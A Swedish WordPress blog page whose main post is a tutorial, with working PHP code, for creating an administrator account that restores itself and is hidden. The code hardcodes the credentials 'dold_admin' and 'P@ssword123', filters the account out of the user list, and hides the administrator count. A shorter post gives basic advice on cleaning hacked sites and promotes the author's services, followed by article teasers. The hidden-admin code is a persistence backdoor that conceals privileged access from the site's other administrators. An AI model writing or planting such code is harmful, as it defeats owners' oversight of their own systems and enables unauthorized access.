Skapa en dold administratör i WordPress

Jag har på några av mina WordPress-sidor haft ett behov av ett extra administratörskonto, ett konto som inte syns. Anledningen till detta är många, till exempel vill jag ha en som alltid skapas när jag lägger upp en ny sida, ett konto som ser till att jag alltid kan logga in även om min användare råkas tas bort.

Jag kommer att utgå från ett ”Child-tema” och lägga detta i funktionsfilen där, men du kan naturligtvis skapa en egen fil med informationen i som du sedan anropar för att få tillgång till användaren. Personligen gillar jag att ha det i just ett child-tema eftersom jag kan få in lite fler funktioner. (Om du inte vet hur man skapar ett Child-tema kan du läsa här.)

Vi börjar med att öppna filen ”functions.php” i child-temat, och lägger till följande funktion:

add_action( 'init', function () {
	$username = 'dold_admin';
	$password = 'P@ssword123';
	$email_address = 'dold_admin@mindoman.se';
	if ( ! username_exists( $username ) ) {
		$user_id = wp_create_user( $username, $password, $email_address );
		$user = new WP_User( $user_id );
		$user->set_role( 'administrator' );
	}
} );

Ändra användarnamn, lösenord och e-postadress till det du vill ha.

Nu har vi skapat ett funktion som lägger till en användare och du kan nu spara filen till din FTP och logga in med de inställningar du valt.

Nu ska vi hindra att någon tar bort användaren du skapat. (Den skapas igen om den tas bort men det är bättre att vi ser till att ingen tar bort den från början.) Så ni väljer att gömma användaren. Lägg till följande kod i ”funtions.php”:

add_action('pre_user_query','yoursite_pre_user_query');

function yoursite_pre_user_query($user_search) {
  global $current_user;
  $username = $current_user->user_login;
 
  if ($username == 'dold_admin') { 
     // Här kan du lägga till kod som ska hända när du är inloggad med din dolda användare
  }
  else {
    global $wpdb;
    $user_search->query_where = str_replace('WHERE 1=1',
      "WHERE 1=1 AND {$wpdb->users}.user_login != 'dold_admin'",$user_search->query_where);
  }
}

Se till att du ändrar ”dold_admin” till det du valde i den tidigare koden (spara ner namnet i en variabel för att slippa ändra på fler ställen om du vill byta namn). Om du nu tittar på användare ser du bara en, men det finns ett problem, man ser att det faktiskt finns två:

Det står klart och tydligt ”Administratör (2)”, trots att det bara finns en i listan, det måste vi ta bort.

För att gömma antalet användare klistrar du in nedan kod i ”functions.php”:

add_action('admin_head','hide_user_count');

function hide_user_count(){
?>
  <style>
    .wp-admin.users-php span.count {display: none;}
  </style>
<?php
}

Spara filen, titta i ”Användare” så ser du att det nu står ”Administratör” istället för ”Administratör (2)”.

Hoppas ni har nytta av detta, lycka till!

Rädda en hackad WordPress

Så, din WordPress har blivit hackad?

Eller är du bara nyfiken på att lära dig mer?

Jag har under många år arbetat med att rädda hackade siter, från början var det alla typer av sidor, numer främst WordPress.

WP-teamet arbetar alltid hårt med att täppa till luckorna men dessvärre hjälper inte alltid det så jag tänkte ge dig några grundläggande tips på hur du ska göra för att rädda din (eller någon annans site).

Tidigare hade jag en egen sida här, en sida där jag erbjöd mina tjänster för att lösa dina problem, den sidan är nu borttagen och ersatt med detta inlägg istället. Du kan fortfarande få hjälp om du behöver, fyll bara i kontaktformuläret nedan.

Innan vi börjar ska vi ställa oss ett par kontrollfrågor:

  • Är du säker på att sidan är hackad?
  • Vad är det som gör att du tror att din sida är hackad?
  • Har du tillgång till FTP-inloggning
  • Har du tidigare vana av olika programspråk såsom PHP och JavaScript?

Man ser olika typer av hackning, en del förstör sidan med ett virus, andra fyller sidan med reklam som du inte bett om, några vidarebefordrar till sida någon annanstans.

Varför hackar man sidor?

Bra fråga, det finns en mängd olika svar på det:

Man vill öka trafiken på andra sidor.
Man vill sprida virus för att komma åt information från din sida.
Man vill sprida reklam för att komma upp i te.x. Googles rankning
Osv.

Många tjänar dessutom pengar på att göra detta, oftast åt, så att säga, lite mer oseriösa företag. De kontaktar nämligen någon som skickar ut reklam om deras hemsidor via ett virus som gömmer sig i på er sida.

Rensa en hackad sida

Att rensa en hackad sida är inte helt lätt, till att börja med måste man veta vad man letar efter, sedan måste man vet hur man letar efter det. Det är ingen dans på rosor att manuellt gå igenom 2000 sidor PHP-skript för att hitta farlig kod och så vidare. Dessutom kanske viruset har skapat nya filer, filer du inte ens tänker på att de inte ska finnas där. När du sedan hittar vad du letar efter, låt os säga en kod-rad, så måste du kunna rensa den från alla filer där den finns.

Som ni ser krävs det lite erfarenhet att göra ett sådant här tilltag och ja, det kostar pengar att anlita någon som gör det åt dig, det kan kosta allt från 500-2000:- men att inte göra det rätt kan kosta 40.000:- för en ny hemsida.

Mitt råd är följande, om du får indikationer på att din sida blivit hackad, gör ingenting, kontakta någon som kan rensa, var inte rädd att fråga om det finns några referenser. Jag har haft kunder som tog två timmar att rensa, företag som har provat innan mig har suttit i fem dagar och inte blivit klara.

Se till att ni gör upp ett pris innan, på så sätt kan de inte sitta och ”dra ut på tiden”, glöm dock inte bort att detta är en viss typ av kompetens, en kompetens som kostar lite mer.

Om ni har en hackad sida, oavsett om det är WordPress eller något annat, (ASP.Net, PHP), så kontakta gärna mig så tittar vi på det, (gratis), sedan gör vi upp ett pris beroende på hur smittad sidan är och om vi båda är nöjda sätter jag fart.

Några små tips för att komma igång

Logga in på på din sida via FTP, väl inne sorterar du alla filer på ”ändrat senast”, då ser du vilka filer som ändrats och när de gjorde det. Redigera en fil som är ändrad nyligen – troligen kommer du hitta någon form av skadlig kod i den. Om du hittar det är det bara att gå vidare till nästa fil, och nästa, och nästa.

Det finns program som kan hjälpa dig med att rensa men oftast är det lättast att bara byta ut de WordPress-filer som blivit infekterade. Ladda ner WordPress och skriv över alla gamla filer. Tänk dock på att du kan få göra lite konfigurering innan allt är klart så ta alltid en backup på hemsida och databas innan du börjar, ja, på den infekterade sidan. (Ibland är det faktiskt lättare att rensa helt från grunden än att ta över från någon.)

När dina WordPress-filer är rensade måste du titta runt lite i din FTP för att kontrollera andra skript, det finns troligtvis filer som inte ska vara där, dessa måste kontrolleras och gås igenom, cache-filer kan behöva tas bort och även snapshots. Viss skadlig kod kan även finnas i databasen.

Kort sagt, det är ett tidskrävande arbete som man måste genomföra.

Sitter du fortfarande fast?

Ditt namn (obligatorisk)

Din epost (obligatorisk)

Din hemsideadress (obligatorisk)

Är det bekräftat att sidan är hackad?
JaNej

Ditt meddelande

Skapa ett konto på LinkedIn i 10 steg

LinkedIn, världens största nätverk och jobb-sökarsida, är ett ställe där man alltid bör synas. Du kan använda till att söka nytt jobb, skapa ett nätverkande med personer i din samma bransch och mycket mer. Så här enkelt skapar du din profil. Läs mer

Spara ”Redigera-länken” för varje inskickat svar i Google Formulär

Jag behövde skapa ett formulär där jag ville ha möjlighet att öppna och redigera inskickade svar. Jag vill inte redigera i ett kalkylblad utan i själva formuläret. Läs mer

Håll dina drivrutiner uppdaterade

För att din dator ska må bra är det viktigt att den är uppdaterad, både Windows och alla dina drivrutiner. Läs mer

Skapa ett säkert prov med Safe Exam Browser

Om du arbetar som lärare ställs du ofta inför problemet att du vill skapa ett prov till dina elever, helst ska det vara digitalt så att de kan använda sina datorer, men du vill ju inte att Google ska användas för att hitta de rätta svaren, här visar jag hur man gör. Läs mer

Fakturera utan företag

Jag hamnade i en situation där jag behövde skicka en faktura till en gammal kund. Eftersom jag valt att inte driva vissa saker under ett eget företag visste jag inte riktigt hur jag skulle gå tillväga. Det var mycket enklare än jag räknat med. Läs mer

Konfigurera WooCommerce

Detta är del två i min guide ”Skapa en webbutik med WooCommerce”, i del 1 lärde vi oss att installera och säkra din WordPress korrekt, nu ska vi gå igenom lite grunder så du kommer igång med din WooCommerce. Rubriken är lite missledande, vi kommer inte att konfigurera så mycket, snarare gå igenom vad man behöver tänka på. Läs mer

Installera och säkra din WordPress

Så, du är intresserad av att starta en egen webbutik men vet inte hur man går tillväga? Kanske vill du ha den som en hobby eller rent av starta ett företag som säljer produkter på Internet. Jag kommer i denna guide, som är uppdelad i flera delar att beskriva hur man gör för att sätta upp en sådan butik. Denna gång kommer jag att använda mig av WordPress och WooCommerce. Läs mer

Flytta din WordPress-sida

Ibland kan det vara så att man behöver flytta sin installation av WordPress till en annan plats, kanske från en utvecklingsdator till sitt webbhotell eller helt enkelt mellan olika webbhotell. Läs mer